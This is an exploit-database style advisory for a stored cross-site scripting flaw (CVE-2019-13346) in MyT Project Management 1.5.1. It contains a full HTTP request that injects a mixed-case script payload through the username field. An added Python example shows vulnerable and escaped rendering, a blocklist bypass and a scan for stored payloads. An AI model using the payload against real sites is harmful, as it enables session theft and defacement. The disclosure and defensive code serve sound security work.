| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2019-13346 | 17 Jul 2019 16:21 | – | cve |
| CVE-2019-13346 | 17 Jul 2019 16:21 | – | cvelist |
| MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting | 12 Jul 2019 00:00 | – | exploitdb |
| EUVD-2019-4850 | 7 Oct 2025 00:30 | – | euvd |
| MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting | 12 Jul 2019 00:00 | – | exploitpack |
| CVE-2019-13346 | 17 Jul 2019 17:15 | – | nvd |
| CVE-2019-13346 | 17 Jul 2019 17:15 | – | osv |
| Cross site scripting | 17 Jul 2019 17:15 | – | prion |
| CVE-2019-13346 | 22 May 2025 08:15 | – | redhatcve |
# Exploit Title: MyT Project Management - User[username] Stored Cross Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://manageyourteam.net/index.html
# Software Link: https://sourceforge.net/projects/myt/files/latest/download
# Version: 1.5.1
# Category: Webapps
# Tested on: Xampp for Windows
# Software Description : MyT is an extremely powerful project management tool, and it's easy to use for both administrators and end-users with a really intuitive structure.
# CVE : CVE-2019-13346
==================================================================
#Description: The "User[username]" parameter is vulnerable to stored (persistent) cross-site scripting. The malicious username is written to the database when the user is created, and the payload executes whenever the stored username is later rendered.
#To exploit the vulnerability, create a user whose username is set to the payload "<sCript>alert("XSS")</sCript>", as in the request below.
POST /myt-1.5.1/user/create HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/myt-1.5.1/user/create
Content-Type: multipart/form-data; boundary=---------------------------1016442643560510919154680312
Content-Length: 3921
Cookie: PHPSESSID=bp16alfk843c4qll0ejq302b2j
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[username]"

<sCript>alert("XSS")</sCript>
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[password]"

12345
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[password_confirm]"

12345
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[email]"

[email protected]
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[name]"

-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[surname]"

.
..snip
..snip
.
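As an added example (not code from the advisory or from the MyT code base, which is PHP), the pattern the advisory describes, written in Python: the unescaped rendering that makes a stored username executable, a case-sensitive blocklist that the mixed-case `<sCript>` payload slips past, the output-encoded rendering that neutralises it, an allow-list check on the username at input time, and a scan over stored rows for payloads that are already in the database. The function names, the row layout and the sample rows are assumptions made for illustration; only the payload string is taken from the request above.

```python
"""Stored XSS via a username field: vulnerable rendering, hardened rendering,
input allow-listing and a scan for already-stored payloads.

Added example; not from the advisory or the MyT project. Function names,
the row layout and SAMPLE_USERS are assumptions for illustration.
"""
import html
import re

# The PoC username from the advisory's request.
PAYLOAD = '<sCript>alert("XSS")</sCript>'

# Constructed sample rows standing in for a `user` table; not real data.
SAMPLE_USERS = [
    {"id": 1, "username": "admin"},
    {"id": 2, "username": "kandemir"},
    {"id": 3, "username": PAYLOAD},
    {"id": 4, "username": '<img src=x onerror="alert(1)">'},
]


def render_user_row_vulnerable(username: str) -> str:
    """The bug: the stored username is interpolated straight into HTML."""
    return f"<tr><td>{username}</td></tr>"


def naive_blocklist_accepts(username: str) -> bool:
    """A case-sensitive '<script' blocklist: mixed-case tags such as <sCript> pass."""
    return "<script" not in username


def render_user_row_hardened(username: str) -> str:
    """Output-encode for an HTML text context (the htmlspecialchars/ENT_QUOTES equivalent).

    Encoding at output time is the fix; it does not depend on what was stored.
    """
    return f"<tr><td>{html.escape(username, quote=True)}</td></tr>"


# Allow-list for usernames: letters, digits, dot, underscore, hyphen; 3 to 32 chars.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{3,32}")


def username_is_valid(username: str) -> bool:
    """Input validation as defence in depth; not a substitute for output encoding."""
    return USERNAME_RE.fullmatch(username) is not None


# Matches an HTML tag start (any case) or an inline event-handler attribute.
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*|on[a-z]+\s*=", re.IGNORECASE)


def find_stored_payloads(rows):
    """Return the ids of rows whose username already carries markup (post-incident sweep)."""
    return [row["id"] for row in rows if TAG_RE.search(row["username"])]


if __name__ == "__main__":
    print("vulnerable :", render_user_row_vulnerable(PAYLOAD))
    print("blocklist  :", "accepted" if naive_blocklist_accepts(PAYLOAD) else "rejected")
    print("hardened   :", render_user_row_hardened(PAYLOAD))
    print("valid name :", username_is_valid(PAYLOAD))
    print("stored hits:", find_stored_payloads(SAMPLE_USERS))
```

The blocklist check is included only to show why filtering the input string is the wrong layer: the advisory's payload is accepted unchanged, while `html.escape` renders it as inert text regardless of casing. Run the sweep against the real user table after patching, since encoding the output does not remove payloads that were stored before the fix.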
# 0day.today [2019-12-04] #